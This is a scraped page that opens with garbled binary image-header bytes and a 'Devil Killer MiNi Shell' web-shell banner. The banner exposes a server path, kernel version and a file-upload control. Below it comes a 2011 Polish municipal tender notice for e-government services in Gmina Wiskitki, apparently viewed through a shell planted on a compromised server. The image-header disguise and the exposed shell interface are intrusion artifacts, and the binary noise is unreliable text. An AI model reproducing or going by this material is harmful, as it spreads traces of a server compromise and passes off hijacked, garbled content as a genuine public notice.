JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/83808-N-2011.html

<p class="kh_header"><b>Wiskitki: e-Usługi w Gminie Wiskitki</b><br>
<b>Numer ogłoszenia: 83808 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wiskitki , ul. Kościuszki 1, 96-315 Wiskitki, woj. mazowieckie, tel. 046 8567212, faks 046 8554154.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiskitki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wiskitki.eobip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> e-Usługi w Gminie Wiskitki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i wdrożenie kompletnej platformy e- usług publicznych wraz z dostawą sprzętu dla Projektu e-Usługi w Gminie Wiskitki - elektroniczny obieg dokumentów z archiwum dokumentów, elektroniczna skrzynka podawcza (ESP) wraz z formularzami elektronicznymi i lokalnym centrum certyfikacji, dostawa i konfiguracja serwerów i PC, konfiguracja sieci LAN., oraz wdrożenie oprogramowania w ramach rozbudowy infrastruktury informatycznej Gminy w ilości i parametrach określonych w załączniku nr 1..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.22.20.00-0, 48.11.00.00-2, 48.76.10.00-0, 30.21.33.00-8, 30.23.13.00-0, 30.23.21.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 25.000 PLN (słownie: dwadzieścia pięć tysięcy złotych).
Wadium może być wnoszone w jednej lub kilku formach wyszczególnionych w art.45 ust. 6. P. z .p :
c)	w pieniądzu;
d)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
e)	w gwarancjach bankowych;
f)	w gwarancjach ubezpieczeniowych;
g)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz.1158 z późniejszymi zmianami).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek depozytowy Gminy  Bank Spółdzielczy w Wiskitkach nr: 56 9304 0002 0000 0648 2000 0040 z adnotacją -wadium na e-Usługi w Gminie Wiskitki - przed upływem terminu składania ofert. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej na przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
Zamawiający wymaga aby gwarancja ubezpieczeniowa, bankowa albo poręczenie stanowiące wadium były nieodwołalne i bezwarunkowe.
Wadium wniesione w formie poręczenia bankowego będzie akceptowane pod warunkiem, że jest zgodne z P .z .p    a w szczególności :
a)	poręczenie będzie zawierało wszystkie przypadki utraty wadium przez Wykonawcę określone w art.46 ust. 4a i 5    P. z .p
b)	poręczenie będzie zawierało określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą określony w specyfikacji istotnych warunków zamówienia.
Wadium wniesione w formie poręczenia udzielonego przez podmiot, o którym mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości będzie akceptowane pod warunkiem, że jest zgodne z P .z . p     a w szczególności:
poręczenie będzie zawierało wszystkie przypadki utraty wadium przez oferenta określone w art.46 ust. 4a i 5 P. z .p.
poręczenie będzie zawierało określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą określony w specyfikacji istotnych warunków zamówienia.
W przypadku wniesienia wadium w formie gwarancji lub poręczenia oryginał dokumentu należy złożyć osobno w kopercie zawierającej ofertę, włączając do oferty kopię dokumentu.
Wykonawca, którego oferta przed upływem terminu składania ofert nie będzie zabezpieczona dopuszczalną formą wadium zostanie wykluczony z postępowania w trybie art. 24 ust 2 pkt 4 ustawy P. z .p , a jego oferta zostanie przez Zamawiającego uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest spełnianie postanowień określonych w art. 22 ust. 1 P. z .p, a w szczególności spełnianie następujących wymagań:
- posiadanie uprawnień do wykonywania działalności zgodnej z przedmiotem zamówienia jeżeli przepisy nakładają obowiązek posiadania takich uprawnień.
Wykonawcy zobowiązani są również wykazać, że nie istnieją wobec nich podstawy do wykluczenia z udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez oferentów dokumenty i oświadczenia, w formule: spełnia - nie spełnia.
Wykonawcy, którzy przedłożą dokumenty i oświadczenia spełniające wymagane warunki zostaną dopuszczeni do badania i oceny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stwierdzi, iż wykonawca spełnił warunek dotyczący posiadania wiedzy i doświadczenia, jeśli wykaże, że należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
Co najmniej dwie  dostawy sprzętu komputerowego (PC) o wartości brutto nie mniejszej niż 130 000 zł (sto trzydzieści tysięcy  zł) każda,
Co najmniej dwie  dostawy sprzętu serwerowego wraz z usługami wirtualizacji serwerów, instalacji i konfiguracji środowiska  o wartości brutto nie mniejszej niż 400 000 zł (czterysta tysięcy zł) każda,
Co najmniej dwie  usługi wdrożenia/konfiguracji/modernizacji  firmowej poczty elektronicznej łącznie z usługami katalogowymi o wartości brutto nie mniejszej niż 100 000 zł (sto tysięcy zł) każda,
Co najmniej dwie dostawy  wraz z wdrożeniem kompletnej zintegrowanej platformy e- usług publicznych opartej o jednolitą platformę bazodanową, obejmującą swym zakresem System Obiegu Dokumentów, Elektroniczną Skrzynkę Podawczą, Biuletyn Informacji Publicznej, Portal Samorządowy, Zintegrowany, centralnie zarządzany system bezpieczeństwa składający się z elementów współpracujących ze sobą: karty inteligentne w formie identyfikatorów pracowniczych, usługi jednokrotnego logowania SSO dostosowane do pracy z oprogramowaniem dedykowanym dla administracji publicznej, usługi katalogowe, infrastruktura PKI, podpis kwalifikowany, komponenty techniczne w postaci kart inteligentnych i oprogramowania za kwotę co najmniej 200 000 zł brutto każde. Każde wdrożenie powinno obejmować co najmniej 40 użytkowników wewnętrznych.
Ponadto Zamawiający wymaga aby wykonawca:
Posiadał autoryzację producenta oferowanego sprzętu komputerowego i serwerowego na serwis urządzeń,
posiadał certyfikat ISO 9001:2008 lub równoważny wydany przez akredytowaną jednostkę, potwierdzający wysoką jakość świadczenia usług,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dokumenty potwierdzające (np. certyfikaty) dysponowanie osobami zdolnymi do wykonania zamówienia:
Wykazać dysponowanie minimum jedną osobą, posiadającą certyfikat producenta proponowanego systemu bazodanowego, w zakresie projektowania i wdrażania.
Wykazać dysponowanie minimum jedną osobą, posiadającą certyfikat producenta proponowanego systemu bezpieczeństwa w zakresie projektowania, wdrażania, konfiguracji oraz administracji.
Wykazać dysponowanie przynajmniej dwiema osobami z certyfikatami MCTS Windows Server 2008 Active Directory, Configuration,
Wykazać dysponowaniem przynajmniej jedną osobą z certyfikatem: 
Microsoft Certified IT Professional Enterprise Messaging Administrator  i 
Microsoft Certified IT Professional Enterprise Administrator 
Wykazać dysponowanie przynajmniej dwiema osobami z tytułami MCTS Windows Server Virtualization, Configuration
Wykazać dysponowanie przynajmniej jedną osobą posiadającą certyfikat inżynierski wydany przez producenta serwerów;
Wykazać dysponowanie przynajmniej jedną osobą posiadającą certyfikat inżynierski wydany przez producenta sprzętu komputerowego PC.
Wykazać dysponowanie przynajmniej jedną osobą posiadającą certyfikat inżynierski wydany przez producenta systemu do backupu,
Wykazać dysponowanie minimum 1 osobą będącą Kierownikiem Projektu posiadającą certyfikat PRINCE2 przynajmniej na poziomie FOUNDATION lub równoważnym, posiadającą minimum 3 letnie doświadczenie kierownicze w branży IT i minimum 3 letnie doświadczenie w administracji samorządowej na stanowiskach kierowniczych.
Wykonawca wybrany do realizacji zamówienia będzie zobowiązany przedstawić, przed podpisaniem umowy, dokumenty potwierdzające, że osoby skierowane do realizacji zamówienia posiadają wymagane uprawnienia (certyfikaty).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dokumenty potwierdzające (np. certyfikaty) dysponowanie osobami zdolnymi do wykonania zamówienia:
Wykazać dysponowanie minimum jedną osobą, posiadającą certyfikat producenta proponowanego systemu bazodanowego, w zakresie projektowania i wdrażania.
Wykazać dysponowanie minimum jedną osobą, posiadającą certyfikat producenta proponowanego systemu bezpieczeństwa w zakresie projektowania, wdrażania, konfiguracji oraz administracji.
Wykazać dysponowanie przynajmniej dwiema osobami z certyfikatami MCTS Windows Server 2008 Active Directory, Configuration,
Wykazać dysponowaniem przynajmniej jedną osobą z certyfikatem: 
Microsoft Certified IT Professional Enterprise Messaging Administrator  i 
Microsoft Certified IT Professional Enterprise Administrator 
Wykazać dysponowanie przynajmniej dwiema osobami z tytułami MCTS Windows Server Virtualization, Configuration
Wykazać dysponowanie przynajmniej jedną osobą posiadającą certyfikat inżynierski wydany przez producenta serwerów;
Wykazać dysponowanie przynajmniej jedną osobą posiadającą certyfikat inżynierski wydany przez producenta sprzętu komputerowego PC.
Wykazać dysponowanie przynajmniej jedną osobą posiadającą certyfikat inżynierski wydany przez producenta systemu do backupu,
Wykazać dysponowanie minimum 1 osobą będącą Kierownikiem Projektu posiadającą certyfikat PRINCE2 przynajmniej na poziomie FOUNDATION lub równoważnym, posiadającą minimum 3 letnie doświadczenie kierownicze w branży IT i minimum 3 letnie doświadczenie w administracji samorządowej na stanowiskach kierowniczych.
Wykonawca wybrany do realizacji zamówienia będzie zobowiązany przedstawić, przed podpisaniem umowy, dokumenty potwierdzające, że osoby skierowane do realizacji zamówienia posiadają wymagane uprawnienia (certyfikaty).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stwierdzi, iż wykonawca spełnił warunek dotyczący znajdowania się w sytuacji ekonomicznej i finansowej umożliwiającej realizację zamówienia, jeśli:
a)	Posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 1 000 000 PLN,
b)	Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 1 000 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Poza dokumentami wskazanymi w niniejszej części SIWZ Wykonawcy zobowiązani również złożyć dokumenty wskazane w pkt 10.2. SIWZ.
Ofertę należy sporządzić zgodnie z wymaganiami umieszczonymi w specyfikacji istotnych warunków zamówienia oraz dołączyć następujące dokumenty:
a)	wypełniony formularz oferty stanowiący załącznik nr 2 do niniejszej specyfikacji,
b)	wypełniony szczegółowy opis przedmiotu zamówienia, stanowiący załącznik nr 1 do niniejszej specyfikacji, z podaniem parametrów technicznych oraz nazw własnych oferowanych urządzeń oraz producentów urządzeń i oferowanych systemów, w przypadkach wskazanych w tabelach zamiast szczegółowego opisu oferowanych parametrów należy potwierdzić spełnianie wymagań zamawiającego, w pozostałych przypadkach należy szczegółowo opisać oferowane parametry,
c)	inne dokumenty, których obowiązek złożenia wynika bezpośrednio z zapisów zawartych w szczegółowym opisie przedmiotu zamówienia,
d)	pełnomocnictwo uprawniające do składania oferty w imieniu wykonawcy składającego ofertę lub wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli uprawnienie takie nie wynika wprost z dokumentów złożonych we wniosku o dopuszczenie do udziału w postępowaniu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 1</li>
<li>2 - Cena ofertowa - 0.75</li>
<li>3 - Cena utrzymania - 0.15</li>
<li>4 - Termin wdrożenia - 0.15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ug_wiskitki@onet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.wiskitki.eobip.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2011 godzina 10:00, miejsce: Urząd Gminy Wiskitki, ul. Kościuszki 1, 96 - 315 Wiskitki.
sekretariat (pok. 19).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przy ocenie ofert ZAMAWIAJĄCY będzie się kierował następującymi kryteriami i ich znaczeniem:
Cena ofertowa (serwery, urządzenia sieciowe, Komputery PC, licencje,  wdrożenia, instruktarz i utrzymanie systemu włącznie z kosztami aktualizacji i hostingu przez pierwszy rok) - o wadze 70 %,
